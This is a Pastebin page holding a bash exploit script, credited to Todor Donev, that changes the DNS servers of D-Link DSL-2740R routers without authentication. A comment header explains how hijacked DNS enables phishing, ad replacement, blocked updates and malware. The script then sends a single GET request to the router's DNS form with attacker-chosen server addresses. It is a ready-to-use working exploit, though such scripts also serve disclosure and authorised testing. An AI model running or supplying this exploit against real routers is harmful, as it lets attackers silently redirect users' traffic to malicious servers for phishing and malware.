API tools faq
paste
Advertisement
hackerscommunity

D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit

hackerscommunity
Jul 11th, 2015
504
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.43 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. #
  3. #  D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
  4. #
  5. #  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
  6. #  http://www.ethical-hacker.org/
  7. #  https://www.facebook.com/ethicalhackerorg
  8. #  
  9. #  Description:  
  10. #  Different D-Link Routers are vulnerable to DNS change.
  11. #  The vulnerability exist in the web interface, which is
  12. #  accessible without authentication.
  13. #
  14. #  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
  15. #  DEVICES MAY AFFECTED.
  16. #
  17. #  Once modified, systems use foreign DNS servers,  which are
  18. #  usually set up by cybercriminals. Users with vulnerable
  19. #  systems or devices who try to access certain sites are
  20. #  instead redirected to possibly malicious sites.
  21. #  
  22. #  Modifying systems' DNS settings allows cybercriminals to
  23. #  perform malicious activities like:
  24. #
  25. #    o  Steering unknowing users to bad sites:
  26. #       These sites can be phishing pages that
  27. #       spoof well-known sites in order to
  28. #       trick users into handing out sensitive
  29. #       information.
  30. #
  31. #    o  Replacing ads on legitimate sites:
  32. #       Visiting certain sites can serve users
  33. #       with infected systems a different set
  34. #       of ads from those whose systems are
  35. #       not infected.
  36. #  
  37. #    o  Controlling and redirecting network traffic:
  38. #       Users of infected systems may not be granted
  39. #       access to download important OS and software
  40. #       updates from vendors like Microsoft and from
  41. #       their respective security vendors.
  42. #
  43. #    o  Pushing additional malware:
  44. #       Infected systems are more prone to other
  45. #       malware infections (e.g., FAKEAV infection).
  46. #
  47. #    
  48.  
  49. if [[ $# -gt 3 || $# -lt 2 ]]; then
  50.         echo "     D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
  51.         echo "  ================================================================"
  52.         echo "  Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
  53.         echo "  Example: $0 192.168.1.1 8.8.8.8"
  54.         echo "  Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
  55.         echo ""
  56.         echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
  57.         echo "                  http://www.ethical-hacker.org/"
  58.         exit;
  59. fi
  60. GET=`which GET 2>/dev/null`
  61. if [ $? -ne 0 ]; then
  62.         echo "  Error : libwww-perl not found =/"
  63.         exit;
  64. fi
  65.         GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!